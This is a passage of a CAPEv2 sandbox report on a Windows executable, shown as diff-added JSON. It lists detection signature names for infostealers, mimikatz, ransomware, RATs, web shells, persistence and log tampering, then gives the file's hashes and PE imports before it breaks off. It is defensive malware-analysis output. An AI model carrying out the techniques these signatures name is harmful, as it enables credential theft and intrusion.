"infostealer_im", + "time": 0.001 + }, + { + "name": "infostealer_mail", + "time": 0.001 + }, + { + "name": "masslogger_files", + "time": 0.0 + }, + { + "name": "poullight_files", + "time": 0.0 + }, + { + "name": "purplewave_mutexes", + "time": 0.0 + }, + { + "name": "quilclipper_mutexes", + "time": 0.0 + }, + { + "name": "qulab_files", + "time": 0.0 + }, + { + "name": "qulab_mutexes", + "time": 0.0 + }, + { + "name": "asyncrat_mutex", + "time": 0.0 + }, + { + "name": "Evade_Execution_Via_ASPNet_Compiler", + "time": 0.0 + }, + { + "name": "Evade_Execute_Via_DeviceCredentialDeployment", + "time": 0.0 + }, + { + "name": "Evade_Execution_Via_Filter_Manager_Control", + "time": 0.0 + }, + { + "name": "Evade_Execution_Via_Intel_GFXDownloadWrapper", + "time": 0.0 + }, + { + "name": "execute_binary_via_appvlp", + "time": 0.0 + }, + { + "name": "execute_binary_via_pcalua", + "time": 0.0 + }, + { + "name": "Execute_Binary_Via_OpenSSH", + "time": 0.0 + }, + { + "name": "execute_binary_via_pcalua", + "time": 0.0 + }, + { + "name": "Execute_Binary_Via_PesterPSModule", + "time": 0.0 + }, + { + "name": "Execute_Binary_Via_ScriptRunner", + "time": 0.0 + }, + { + "name": "execute_binary_via_ttdinject", + "time": 0.0 + }, + { + "name": "Execute_Binary_Via_VisualStudioLiveShare", + "time": 0.0 + }, + { + "name": "Execute_Msiexec_Via_Explorer", + "time": 0.0 + }, + { + "name": "execute_remote_msi", + "time": 0.0 + }, + { + "name": "execute_suspicious_powershell_via_runscripthelper", + "time": 0.0 + }, + { + "name": "execute_suspicious_powershell_via_sqlps", + "time": 0.0 + }, + { + "name": "Indirect_Command_Execution_Via_ConsoleWindowHost", + "time": 0.0 + }, + { + "name": "Perform_Malicious_Activities_Via_Headless_Browser", + "time": 0.0 + }, + { + "name": "Register_DLL_Via_CertOC", + "time": 0.0 + }, + { + "name": "Register_DLL_Via_MSIEXEC", + "time": 0.0 + }, + { + "name": "Register_DLL_Via_Odbcconf", + "time": 0.0 + }, + { + "name": "Scriptlet_Proxy_Execution_Via_Pubprn", + "time": 0.0 + }, + { + "name": "ie_martian_children", + "time": 0.0 + }, + { + "name": "office_martian_children", + "time": 0.0 + }, + { + "name": "mimics_icon", + "time": 0.0 + }, + { + "name": "masquerade_process_name", + "time": 0.001 + }, + { + "name": "mimikatz_modules", + "time": 0.0 + }, + { + "name": "ms_office_cmd_rce", + "time": 0.0 + }, + { + "name": "mount_copy_to_webdav_share", + "time": 0.0 + }, + { + "name": "potential_protocol_tunneling_via_legit_utilities", + "time": 0.0 + }, + { + "name": "potential_protocol_tunneling_via_qemu", + "time": 0.0 + }, + { + "name": "suspicious_execution_via_dotnet_remoting", + "time": 0.0 + }, + { + "name": "modify_certs", + "time": 0.0 + }, + { + "name": "dotnet_clr_usagelog_regkeys", + "time": 0.0 + }, + { + "name": "modify_hostfile", + "time": 0.0 + }, + { + "name": "modify_oem_information", + "time": 0.0 + }, + { + "name": "modify_security_center_warnings", + "time": 0.0 + }, + { + "name": "modify_uac_prompt", + "time": 0.0 + }, + { + "name": "network_dns_blockchain", + "time": 0.0 + }, + { + "name": "network_dns_opennic", + "time": 0.0 + }, + { + "name": "network_dns_paste_site", + "time": 0.0 + }, + { + "name": "network_dns_reverse_proxy", + "time": 0.0 + }, + { + "name": "network_dns_temp_file_storage", + "time": 0.0 + }, + { + "name": "network_dns_temp_urldns", + "time": 0.0 + }, + { + "name": "network_dns_url_shortener", + "time": 0.0 + }, + { + "name": "network_dns_doh_tls", + "time": 0.0 + }, + { + "name": "suspicious_tld", + "time": 0.0 + }, + { + "name": "network_tor_service", + "time": 0.0 + }, + { + "name": "office_code_page", + "time": 0.0 + }, + { + "name": "office_addinloading", + "time": 0.0 + }, + { + "name": "office_perfkey", + "time": 0.0 + }, + { + "name": "office_macro", + "time": 0.0 + }, + { + "name": "changes_trust_center_settings", + "time": 0.0 + }, + { + "name": "disables_vba_trust_access", + "time": 0.0 + }, + { + "name": "office_macro_autoexecution", + "time": 0.0 + }, + { + "name": "office_macro_ioc", + "time": 0.0 + }, + { + "name": "office_macro_malicious_prediction", + "time": 0.0 + }, + { + "name": "office_macro_suspicious", + "time": 0.0 + }, + { + "name": "rtf_aslr_bypass", + "time": 0.0 + }, + { + "name": "rtf_anomaly_characterset", + "time": 0.0 + }, + { + "name": "rtf_anomaly_version", + "time": 0.0 + }, + { + "name": "rtf_embedded_content", + "time": 0.0 + }, + { + "name": "rtf_embedded_office_file", + "time": 0.0 + }, + { + "name": "rtf_exploit_static", + "time": 0.0 + }, + { + "name": "office_security", + "time": 0.0 + }, + { + "name": "office_anomalous_feature", + "time": 0.0 + }, + { + "name": "office_dde_command", + "time": 0.0 + }, + { + "name": "packer_armadillo_mutex", + "time": 0.0 + }, + { + "name": "packer_armadillo_regkey", + "time": 0.0 + }, + { + "name": "persistence_ads", + "time": 0.0 + }, + { + "name": "persistence_safeboot", + "time": 0.0 + }, + { + "name": "persistence_ifeo", + "time": 0.0 + }, + { + "name": "persistence_silent_process_exit", + "time": 0.0 + }, + { + "name": "persistence_rdp_registry", + "time": 0.0 + }, + { + "name": "persistence_rdp_shadowing", + "time": 0.0 + }, + { + "name": "persistence_service", + "time": 0.0 + }, + { + "name": "persistence_shim_database", + "time": 0.0 + }, + { + "name": "powerpool_mutexes", + "time": 0.0 + }, + { + "name": "powershell_scriptblock_logging", + "time": 0.0 + }, + { + "name": "powershell_command_suspicious", + "time": 0.0 + }, + { + "name": "powershell_renamed", + "time": 0.0 + }, + { + "name": "powershell_reversed", + "time": 0.0 + }, + { + "name": "powershell_variable_obfuscation", + "time": 0.0 + }, + { + "name": "prevents_safeboot", + "time": 0.0 + }, + { + "name": "cmdline_process_discovery", + "time": 0.0 + }, + { + "name": "cryptomix_mutexes", + "time": 0.0 + }, + { + "name": "dharma_mutexes", + "time": 0.0 + }, + { + "name": "ransomware_extensions", + "time": 0.001 + }, + { + "name": "ransomware_files", + "time": 0.001 + }, + { + "name": "fonix_mutexes", + "time": 0.0 + }, + { + "name": "gandcrab_mutexes", + "time": 0.0 + }, + { + "name": "germanwiper_mutexes", + "time": 0.0 + }, + { + "name": "medusalocker_mutexes", + "time": 0.0 + }, + { + "name": "medusalocker_regkeys", + "time": 0.0 + }, + { + "name": "nemty_mutexes", + "time": 0.0 + }, + { + "name": "nemty_regkeys", + "time": 0.0 + }, + { + "name": "pysa_mutexes", + "time": 0.0 + }, + { + "name": "ransomware_radamant", + "time": 0.0 + }, + { + "name": "ransomware_recyclebin", + "time": 0.0 + }, + { + "name": "revil_mutexes", + "time": 0.0 + }, + { + "name": "ransomware_revil_regkey", + "time": 0.0 + }, + { + "name": "satan_mutexes", + "time": 0.0 + }, + { + "name": "snake_ransom_mutexes", + "time": 0.0 + }, + { + "name": "stop_ransom_mutexes", + "time": 0.0 + }, + { + "name": "stop_ransomware_cmd", + "time": 0.0 + }, + { + "name": "ransomware_stopdjvu", + "time": 0.0 + }, + { + "name": "rat_beebus_mutexes", + "time": 0.0 + }, + { + "name": "blacknet_mutexes", + "time": 0.0 + }, + { + "name": "blackrat_mutexes", + "time": 0.0 + }, + { + "name": "crat_mutexes", + "time": 0.0 + }, + { + "name": "dcrat_files", + "time": 0.0 + }, + { + "name": "dcrat_mutexes", + "time": 0.0 + }, + { + "name": "rat_fynloski_mutexes", + "time": 0.0 + }, + { + "name": "limerat_mutexes", + "time": 0.0 + }, + { + "name": "limerat_regkeys", + "time": 0.0 + }, + { + "name": "lodarat_file_behavior", + "time": 0.0 + }, + { + "name": "modirat_behavior", + "time": 0.0 + }, + { + "name": "njrat_regkeys", + "time": 0.0 + }, + { + "name": "obliquerat_files", + "time": 0.0 + }, + { + "name": "obliquerat_mutexes", + "time": 0.0 + }, + { + "name": "parallax_mutexes", + "time": 0.0 + }, + { + "name": "rat_pcclient", + "time": 0.0 + }, + { + "name": "rat_plugx_mutexes", + "time": 0.0 + }, + { + "name": "rat_poisonivy_mutexes", + "time": 0.0 + }, + { + "name": "rat_quasar_mutexes", + "time": 0.0 + }, + { + "name": "ratsnif_mutexes", + "time": 0.0 + }, + { + "name": "rat_spynet", + "time": 0.0 + }, + { + "name": "venomrat_mutexes", + "time": 0.0 + }, + { + "name": "warzonerat_files", + "time": 0.0 + }, + { + "name": "warzonerat_regkeys", + "time": 0.0 + }, + { + "name": "xpertrat_files", + "time": 0.0 + }, + { + "name": "xpertrat_mutexes", + "time": 0.0 + }, + { + "name": "rat_xtreme_mutexes", + "time": 0.0 + }, + { + "name": "recon_fingerprint", + "time": 0.0 + }, + { + "name": "remcos_files", + "time": 0.0 + }, + { + "name": "remcos_mutexes", + "time": 0.0 + }, + { + "name": "remcos_regkeys", + "time": 0.0 + }, + { + "name": "rdptcp_key", + "time": 0.0 + }, + { + "name": "uses_rdp_clip", + "time": 0.0 + }, + { + "name": "uses_remote_desktop_session", + "time": 0.0 + }, + { + "name": "removes_networking_icon", + "time": 0.0 + }, + { + "name": "removes_pinned_programs", + "time": 0.0 + }, + { + "name": "removes_security_maintenance_icon", + "time": 0.0 + }, + { + "name": "removes_startmenu_defaults", + "time": 0.0 + }, + { + "name": "removes_username_startmenu", + "time": 0.0 + }, + { + "name": "spicyhotpot_behavior", + "time": 0.0 + }, + { + "name": "sniffer_winpcap", + "time": 0.0 + }, + { + "name": "spreading_autoruninf", + "time": 0.0 + }, + { + "name": "stealth_hidden_extension", + "time": 0.0 + }, + { + "name": "stealth_hiddenreg", + "time": 0.0 + }, + { + "name": "stealth_hide_notifications", + "time": 0.0 + }, + { + "name": "stealth_webhistory", + "time": 0.0 + }, + { + "name": "sysinternals_psexec", + "time": 0.0 + }, + { + "name": "sysinternals_tools", + "time": 0.0 + }, + { + "name": "tampers_etw", + "time": 0.0 + }, + { + "name": "lsa_tampering", + "time": 0.0 + }, + { + "name": "tampers_powershell_logging", + "time": 0.0 + }, + { + "name": "targeted_flame", + "time": 0.0 + }, + { + "name": "territorial_disputes_sigs", + "time": 0.002 + }, + { + "name": "trickbot_mutex", + "time": 0.0 + }, + { + "name": "fleercivet_mutex", + "time": 0.0 + }, + { + "name": "lokibot_mutexes", + "time": 0.0 + }, + { + "name": "ursnif_behavior", + "time": 0.0 + }, + { + "name": "uses_adfind", + "time": 0.0 + }, + { + "name": "uses_ms_protocol", + "time": 0.0 + }, + { + "name": "neshta_mutexes", + "time": 0.0 + }, + { + "name": "renamer_mutexes", + "time": 0.0 + }, + { + "name": "owa_web_shell_files", + "time": 0.0 + }, + { + "name": "web_shell_files", + "time": 0.0 + }, + { + "name": "web_shell_processes", + "time": 0.0 + }, + { + "name": "dotnet_csc_build", + "time": 0.0 + }, + { + "name": "multiple_explorer_instances", + "time": 0.0 + }, + { + "name": "script_tool_executed", + "time": 0.0 + }, + { + "name": "suspicious_certutil_use", + "time": 0.0 + }, + { + "name": "suspicious_command_tools", + "time": 0.0 + }, + { + "name": "suspicious_mpcmdrun_use", + "time": 0.0 + }, + { + "name": "suspicious_ping_use", + "time": 0.0 + }, + { + "name": "uses_powershell_copyitem", + "time": 0.0 + }, + { + "name": "uses_windows_utilities", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_appcmd", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_csvde_ldifde", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_cipher", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_clickonce", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_curl", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_dsquery", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_esentutl", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_finger", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_mode", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_ntdsutil", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_nltest", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_xcopy", + "time": 0.0 + }, + { + "name": "wmic_command_suspicious", + "time": 0.0 + }, + { + "name": "scrcons_wmi_script_consumer", + "time": 0.0 + }, + { + "name": "allaple_mutexes", + "time": 0.0 + } + ], + "reporting": [ + { + "name": "BinGraph", + "time": 0.0 + }, + { + "name": "CAPASummary", + "time": 1.6 + }, + { + "name": "MITRE_TTPS", + "time": 0.007 + }, + { + "name": "PCAP2CERT", + "time": 0.0 + } + ] + }, + "target": { + "category": "file", + "file": { + "name": "3937597df70645ac297e.exe", + "path": "/opt/CAPEv2/storage/binaries/3937597df70645ac297ea0c45eb12863f26394fa1b88bf869ca85b476d21dafc", + "guest_paths": "", + "size": 823296, + "crc32": "A6E77085", + "md5": "2bb81b2a4d73eb41d28af6f70f575e85", + "sha1": "13f9f08394e1a1eec023c2aa0a082b7de614593f", + "sha256": "3937597df70645ac297ea0c45eb12863f26394fa1b88bf869ca85b476d21dafc", + "sha512": "df15d030d2ae0d2d23bf8a4906e9676e457f805806fbf898bef1604df95f8bcff0d21ebc0d3e81114b00ffa9a8b53da9010c624ca63ac069bbd0e1fc5a309119", + "rh_hash": null, + "ssdeep": "12288:XRYxH5FNAuiTPq40c9iq5fb5sU3z4ZuF:O1AuOicQqxKyQ", + "type": "PE32 executable (GUI) Intel 80386, for MS Windows", + "yara": [], + "cape_yara": [], + "clamav": [], + "tlsh": "T1B4057C1236F1C4B2C6E215714D65967963EAEC200B3649C32AB13F1F3979EC25B372B6", + "sha3_384": "8f7b0c5656497ddb5f862c96ad3928dd45a535f39ed5d9af7099d4240fdd6a94fffaa7e5b2ecda99914c6beeb898b507", + "pe": { + "guest_signers": { + "aux_sha1": null, + "aux_timestamp": null, + "aux_valid": false, + "aux_error": true, + "aux_error_desc": "No signature found.", + "aux_signers": [] + }, + "digital_signers": [], + "imagebase": "0x00400000", + "entrypoint": "0x0000b86a", + "ep_bytes": "6a6068f0ee4600e8a20c0000bf940000", + "peid_signatures": null, + "reported_checksum": "0x000d2893", + "actual_checksum": "0x000d2893", + "osversion": "4.0", + "pdbpath": "c:\\Users\\Mr.Anderson\\Desktop\\2003\\13.8.20\\ExpandingCheck_demo\\ExpCheckTest\\Release\\ExpCheckTest.pdb", + "imports": { + "KERNEL32": { + "dll": "KERNEL32.dll", + "imports": [ + { + "address": "0x485f54", + "name": "GetSystemInfo" + }, + { + "address": "0x485f58", + "name": "VirtualQuery" + }, + { + "address": "0x485f5c", + "name": "GetStartupInfoA" + }, + { + "address": "0x485f60", + "name": "GetCommandLineA" + }, + { + "address": "0x485f64", + "name": "TerminateProcess" + }, + { + "address": "0x485f68", + "name": "ExitThread" + }, + { + "address": "0x485f6c", + "name": "CreateThread" + }, + { + "address": "0x485f70", + "name": "HeapReAlloc" + }, + { + "address": "0x485f74", + "name": "HeapSize" + }, + { + "address": "0x485f78", + "name": "LCMapStringA" + }, + { + "address": "0x485f7c", + "name": "LCMapStringW" + }, + { + "address": "0x485f80", + "name": "FatalAppExitA" + }, + { + "address": "0x485f84", + "name": "HeapDestroy" + }, + { + "address": "0x485f88", + "name": "HeapCreate" + }, + { + "address": "0x485f8c", + "name": "VirtualFree" + }, + { + "address": "0x485f90", + "name": "IsBadWritePtr" + }, + { + "address": "0x485f94", + "name": "GetStdHandle" + }, + { + "address": "0x485f98", + "name": "UnhandledExceptionFilter" + }, + { + "address": "0x485f9c", + "name": "FreeEnvironmentStringsA" + }, + { + "address": "0x485fa0", + "name": "GetEnvironmentStrings" + }, + { + "address": "0x485fa4", + "name": "FreeEnvironmentStringsW" + }, + { + "address": "0x485fa8", + "name": "GetEnvironmentStringsW" + }, + { + "address": "0x485fac", + "name": "VirtualAlloc" + }, + { + "address": "0x485fb0", + "name": "GetFileType" + }, + { + "address": "0x485fb4", + "name": "QueryPerformanceCounter" + }, + { + "address": "0x485fb8", + "name": "GetTickCount" + }, + { + "address": "0x485fbc", + "name": "GetCurrentProcessId" + }, + { + "address": "0x485fc0", + "name": "GetSystemTimeAsFileTime" + }, + { + "address": "0x485fc4", + "name": "SetUnhandledExceptionFilter" + }, + { + "address": "0x485fc8", + "name": "GetStringTypeA" + }, + { + "address": "0x485fcc", + "name": "GetStringTypeW" + }, + { + "address": "0x485fd0", + "name": "GetTimeZoneInformation" + }, + { + "address": "0x485fd4", + "name": "IsBadReadPtr" + }, + { + "address": "0x485fd8", + "name": "IsBadCodePtr" + }, + { + "address": "0x485fdc", + "name": "GetTimeFormatA" + }, + { + "address": "0x485fe0", + "name": "GetDateFormatA" + }, + { + "address": "0x485fe4", + "name": "GetUserDefaultLCID" + }, + { + "address": "0x485fe8", + "name": "EnumSystemLocalesA" + }, + { + "address": "0x485fec", + "name": "IsValidLocale" + }, + { + "address": "0x485ff0", + "name": "IsValidCodePage" + }, + { + "address": "0x485ff4", + "name": "SetConsoleCtrlHandler" + }, + { + "address": "0x485ff8", + "name": "SetStdHandle" + }, + { + "address": "0x485ffc", + "name": "GetLocaleInfoW" + }, + { + "address": "0x486000", + "name": "SetEnvironmentVariableA" + }, + { + "address": "0x486004", + "name": "VirtualProtect" + }, + { + "address": "0x486008", + "name": "HeapFree" + }, + { + "address": "0x48600c", + "name": "HeapAlloc" + }, + { + "address": "0x486010", + "name": "RtlUnwind" + }, + { + "address": "0x486014", + "name": "GetDiskFreeSpaceA" + }, + { + "address": "0x486018", + "name": "GetTempFileNameA" + }, + { + "address": "0x48601c", + "name": "LocalLock" + }, + { + "address": "0x486020", + "name": "LocalUnlock" + }, + { + "address": "0x486024", + "name": "GetFileTime" + }, + { + "address": "0x486028", + "name": "GetFileAttributesA" + }, + { + "address": "0x48602c", + "name": "SetFileAttributesA" + }, + { + "address": "0x486030", + "name": "SetFileTime" + }, + { + "address": "0x486034", + "name": "LocalFileTimeToFileTime" + }, + { + "address": "0x486038", + "name": "FileTimeToLocalFileTime" + }, + { + "address": "0x48603c", + "name": "SetErrorMode" + }, + { + "address": "0x486040", + "name": "SystemTimeToFileTime" + }, + { + "address": "0x486044", + "name": "FileTimeToSystemTime" + }, + { + "address": "0x486048", + "name": "GetShortPathNameA" + }, + { + "address": "0x48604c", + "name": "CreateFileA" + }, + { + "address": "0x486050", + "name": "GetFullPathNameA" + }, + { + "address": "0x486054", + "name": "GetVolumeInformationA" + }, + { + "address": "0x486058", + "name": "FindFirstFileA" + }, + { + "address": "0x48605c", + "name": "FindClose" + }, + { + "address": "0x486060", + "name": "GetCurrentProcess" + }, + { + "address": "0x486064", + "name": "DuplicateHandle" + }, + { + "address": "0x486068", + "name": "GetFileSize" + }, + { + "address": "0x48606c", + "name": "SetEndOfFile" + }, + { + "address": "0x486070", + "name": "UnlockFile" + }, + { + "address": "0x486074", + "name": "LockFile" + }, + { + "address": "0x486078", + "name": "FlushFileBuffers" + }, + { + "address": "0x48607c", + "name": "SetFilePointer" + }, + { + "address": "0x486080", + "name": "WriteFile" + }, + { + "address": "0x486084", + "name": "ReadFile" + }, + { + "address": "0x486088", + "name": "DeleteFileA" + }, + { + "address": "0x48608c", + "name": "MoveFileA" + }, + { + "address": "0x486090", + "name": "GetCurrentDirectoryA" + }, + { + "address": "0x486094", + "name": "GetPrivateProfileStringA" + }, + { + "address": "0x486098", + "name": "WritePrivateProfileStringA" + }, + { + "address": "0x48609c", + "name": "GetPrivateProfileIntA" + }, + { + "address": "0x4860a0", + "name": "GetOEMCP" + }, + { + "address": "0x4860a4", + "name": "GetCPInfo" + }, + { + "address": "0x4860a8", + "name": "InterlockedIncrement" + }, + { + "address": "0x4860ac", + "name": "GlobalFlags" + }, + { + "address": "0x4860b0", + "name": "TlsFree" + }, + { + "address": "0x4860b4", + "name": "LocalReAlloc" + }, + { + "address": "0x4860b8", + "name": "TlsSetValue" + }, + { + "address": "0x4860bc", + "name": "TlsAlloc" + }, + { + "address": "0x4860c0", + "name": "TlsGetValue" + }, + { + "address": "0x4860c4", + "name": "EnterCriticalSection" + }, + { + "address": "0x4860c8", + "name": "GlobalHandle" + }, + { + "address": "0x4860cc", + "name": "GlobalReAlloc" + }, + { + "address": "0x4860d0", + "name": "LeaveCriticalSection" + }, + { + "address": "0x4860d4", + "name": "LocalAlloc" + }, + { + "address": "0x4860d8", + "name": "CopyFileA" + }, + { + "address": "0x4860dc", + "name": "GlobalSize" + }, + { + "address": "0x4860e0", + "name": "FormatMessageA" + }, + { + "address": "0x4860e4", + "name": "LocalFree" + }, + { + "address": "0x4860e8", + "name": "InterlockedDecrement" + }, + { + "address": "0x4860ec", + "name": "GlobalFree" + }, + { + "address": "0x4860f0", + "name": "CreateEventA" + }, + { + "address": "0x4860f4", + "name": "SuspendThread" + }, + { + "address": "0x4860f8", + "name": "SetEvent" + }, + { + "address": "0x4860fc", + "name": "WaitForSingleObject" + }, + { + "address": "0x486100", + "name": "ResumeThread" + }, + { + "address": "0x486104", + "name": "SetThreadPriority" + }, + { + "address": "0x486108", + "name": "CloseHandle" + }, + { + "address": "0x48610c", + "name": "SizeofResource" + }, + { + "address": "0x486110", + "name": "GetCurrentThread" + }, + { + "address": "0x486114", + "name": "GlobalAlloc" + }, + { + "address": "0x486118", + "name": "GetModuleFileNameA" + }, + { + "address": "0x48611c", + "name": "ConvertDefaultLocale" + }, + { + "address": "0x486120", + "name": "EnumResourceLanguagesA" + }, + { + "address": "0x486124", + "name": "lstrcpyA" + }, + { + "address": "0x486128", + "name": "lstrcmpA" + }, + { + "address": "0x48612c", + "name": "GlobalLock" + }, + { + "address": "0x486130", + "name": "GlobalUnlock" + }, + { + "address": "0x486134", + "name": "MulDiv" + }, + { + "address": "0x486138", + "name": "DeleteCriticalSection" + }, + { + "address": "0x48613c", + "name": "InitializeCriticalSection" + }, + { + "address": "0x486140", + "name": "RaiseException" + }, + { + "address": "0x486144", + "name": "SetLastError" + }, + { + "address": "0x486148", + "name": "FindResourceA" + }, + { + "address": "0x48614c", + "name": "LoadResource" + }, + { + "address": "0x486150", + "name": "LockResource" + }, + { + "address": "0x486154", + "name": "FreeResource" + }, + { + "address": "0x486158", + "name": "GetCurrentThreadId" + }, + { + "address": "0x48615c", + "name": "GlobalGetAtomNameA" + }, + { + "address": "0x486160", + "name": "GlobalAddAtomA" + }, + { + "address": "0x486164", + "name": "GlobalFindAtomA" + }, + { + "address": "0x486168", + "name": "GlobalDeleteAtom" + }, + { + "address": "0x48616c", + "name": "LoadLibraryA" + }, + { + "address": "0x486170", + "name": "FreeLibrary" + }, + { + "address": "0x486174", + "name": "lstrcatA" + }, + { + "address": "0x486178", + "name": "lstrcmpW" + }, + { + "address": "0x48617c", + "name": "lstrcpynA" + }, + { + "address": "0x486180", + "name": "GetModuleHandleA" + }, + { + "address": "0x486184", + "name": "GetProcAddress" + }, + { + "address": "0x486188", + "name": "GetStringTypeExW" + }, + { + "address": "0x48618c", + "name": "GetStringTypeExA" + }, + { + "address": "0x486190", + "name": "GetEnvironmentVariableW" + }, + { + "address": "0x486194", + "name": "GetEnvironmentVariableA" + }, + { + "address": "0x486198", + "name": "CompareStringW" + }, + { + "address": "0x48619c", + "name": "CompareStringA" + }, + { + "address": "0x4861a0", + "name": "lstrlenA" + }, + { + "address": "0x4861a4", + "name": "lstrcmpiW" + }, + { + "address": "0x4861a8", + "name": "lstrlenW" + }, + { + "address": "0x4861ac", + "name": "lstrcmpiA" + }, + { + "address": "0x4861b0", + "name": "GetVersion" + }, + { + "address": "0x4861b4", + "name": "GetLastError" + }, + { + "address": "0x4861b8", + "name": "WideCharToMultiByte" + }, + { + "address": "0x4861bc", + "name": "MultiByteToWideChar" + }, + { + "address": "0x4861c0", + "name": "GetVersionExA" + }, + { + "address": "0x4861c4", + "name": "GetThreadLocale" + }, + { + "address": "0x4861c8", + "name": "GetLocaleInfoA" + }, + { + "address": "0x4861cc", + "name": "GetACP" + }, + { + "address": "0x4861d0", + "name": "InterlockedExchange" + }, + { + "address": "0x4861d4", + "name": "SetHandleCount" + }, + { + "address": "0x4861d8", + "name": "ExitProcess" + } + ] + }, + "USER32": { + "dll": "USER32.dll", + "imports": [ + { + "address": "0x4863e8", + "name": "KillTimer" + }, + { + "address": "0x4863ec", + "name": "IsClipboardFormatAvailable" + }, + { + "address": "0x4863f0", + "name": "MessageBeep" + }, + { + "address": "0x4863f4", + "name": "GetTabbedTextExtentA" + }, + { + "address": "0x4863f8", + "name": "GetDCEx" + }, + { + "address": "0x4863fc", + "name": "LockWindowUpdate" + }, + { + "address": "0x486400", + "name": "GetSystemMenu" + }, + { + "address": "0x486404", + "name": "SetParent" + }, + { + "address": "0x486408", + "name": "InsertMenuItemA" + }, + { + "address": "0x48640c", + "name": "CreatePopupMenu" + }, + { + "address": "0x486410", + "name": "SetRectEmpty" + }, + { + "address": "0x486414", + "name": "BringWindowToTop" + }, + { + "address": "0x486418", + "name": "SetMenu" + }, + { + "address": "0x48641c", + "name": "TranslateAcceleratorA" + }, + { + "address": "0x486420", + "name": "GetDialogBaseUnits" + }, + { + "address": "0x486424", + "name": "DestroyIcon" + }, + { + "address": "0x486428", + "name": "DeleteMenu" + }, + { + "address": "0x48642c", + "name": "WaitMessage" + }, + { + "address": "0x486430", + "name": "GetWindowThreadProcessId" + }, + { + "address": "0x486434", + "name": "ReleaseCapture" + }, + { + "address": "0x486438", + "name": "WindowFromPoint" + }, + { + "address": "0x48643c", + "name": "SetCapture" + }, + { + "address": "0x486440", + "name": "LoadCursorA" + }, + { + "address": "0x486444", + "name": "GetSysColorBrush" + }, + { + "address": "0x486448", + "name": "DestroyMenu" + }, + { + "address": "0x48644c", + "name": "GetMenuItemInfoA" + }, + { + "address": "0x486450", + "name": "InflateRect" + }, + { + "address": "0x486454", + "name": "GetMenuStringA" + }, + { + "address": "0x486458", + "name": "AppendMenuA" + }, + { + "address": "0x48645c", + "name": "InsertMenuA" + }, + { + "address": "0x486460", + "name": "RemoveMenu" + }, + { + "address": "0x486464", + "name": "wsprintfA" + }, + { + "address": "0x486468", + "name": "GetDesktopWindow" + }, + { + "address": "0x48646c", + "name": "CreateDialogIndirectParamA" + }, + { + "address": "0x486470", + "name": "GetNextDlgTabItem" + }, + { + "address": "0x486474", + "name": "EndDialog" + }, + { + "address": "0x486478", + "name": "GetMessageA" + }, + { + "address": "0x48647c", + "name": "TranslateMessage" + }, + { + "address": "0x486480", + "name": "GetActiveWindow" + }, + { + "address": "0x486484", + "name": "GetCursorPos" + }, + { + "address": "0x486488", + "name": "ValidateRect" + }, + { + "address": "0x48648c", + "name": "ShowOwnedPopups" + }, + { + "address": "0x486490", + "name": "SetCursor" + }, + { + "address": "0x486494", + "name": "PostQuitMessage" + }, + { + "address": "0x486498", + "name": "EndPaint" + }, + { + "address": "0x48649c", + "name": "BeginPaint" + }, + { + "address": "0x4864a0", + "name": "GetWindowDC" + }, + { + "address": "0x4864a4", + "name": "ReleaseDC" + }, + { + "address": "0x4864a8", + "name": "GetDC" + }, + { + "address": "0x4864ac", + "name": "ClientToScreen" + }, + { + "address": "0x4864b0", + "name": "GrayStringA" + }, + { + "address": "0x4864b4", + "name": "DrawTextExA" + }, + { + "address": "0x4864b8", + "name": "DrawTextA" + }, + { + "address": "0x4864bc", + "name": "TabbedTextOutA" + }, + { + "address": "0x4864c0", + "name": "FillRect" + }, + { + "address": "0x4864c4", + "name": "SetMenuItemBitmaps" + }, + { + "address": "0x4864c8", + "name": "ModifyMenuA" + }, + { + "address": "0x4864cc", + "name": "EnableMenuItem" + }, + { + "address": "0x4864d0", + "name": "CheckMenuItem" + }, + { + "address": "0x4864d4", + "name": "GetMenuCheckMarkDimensions" + }, + { + "address": "0x4864d8", + "name": "LoadBitmapA" + }, + { + "address": "0x4864dc", + "name": "ScrollWindowEx" + }, + { + "address": "0x4864e0", + "name": "IsWindowEnabled" + }, + { + "address": "0x4864e4", + "name": "SetWindowTextA" + }, + { + "address": "0x4864e8", + "name": "IsDialogMessageA" + }, + { + "address": "0x4864ec", + "name": "IsDlgButtonChecked" + }, + { + "address": "0x4864f0", + "name": "SetDlgItemTextA" + }, + { + "address": "0x4864f4", + "name": "SetDlgItemInt" + }, + { + "address": "0x4864f8", + "name": "GetDlgItemTextA" + }, + { + "address": "0x4864fc", + "name": "SetTimer" + }, + { + "address": "0x486500", + "name": "CheckRadioButton" + }, + { + "address": "0x486504", + "name": "CheckDlgButton" + }, + { + "address": "0x486508", + "name": "RegisterWindowMessageA" + }, + { + "address": "0x48650c", + "name": "WinHelpA" + }, + { + "address": "0x486510", + "name": "GetCapture" + }, + { + "address": "0x486514", + "name": "CreateWindowExA" + }, + { + "address": "0x486518", + "name": "SetWindowsHookExA" + }, + { + "address": "0x48651c", + "name": "CallNextHookEx" + }, + { + "address": "0x486520", + "name": "GetClassLongA" + }, + { + "address": "0x486524", + "name": "GetClassInfoExA" + }, + { + "address": "0x486528", + "name": "GetClassNameA" + }, + { + "address": "0x48652c", + "name": "SetPropA" + }, + { + "address": "0x486530", + "name": "GetPropA" + }, + { + "address": "0x486534", + "name": "RemovePropA" + }, + { + "address": "0x486538", + "name": "SendDlgItemMessageA" + }, + { + "address": "0x48653c", + "name": "GetFocus" + }, + { + "address": "0x486540", + "name": "SetFocus" + }, + { + "address": "0x486544", + "name": "IsChild" + }, + { + "address": "0x486548", + "name": "GetWindowTextLengthA" + }, + { + "address": "0x48654c", + "name": "GetWindowTextA" + }, + { + "address": "0x486550", + "name": "GetForegroundWindow" + }, + { + "address": "0x486554", + "name": "GetLastActivePopup" + }, + { + "address": "0x486558", + "name": "SetActiveWindow" + }, + { + "address": "0x48655c", + "name": "DispatchMessageA" + }, + { + "address": "0x486560", + "name": "BeginDeferWindowPos" + }, + { + "address": "0x486564", + "name": "EndDeferWindowPos" + }, + { + "address": "0x486568", + "name": "GetDlgItem" + }, + { + "address": "0x48656c", + "name": 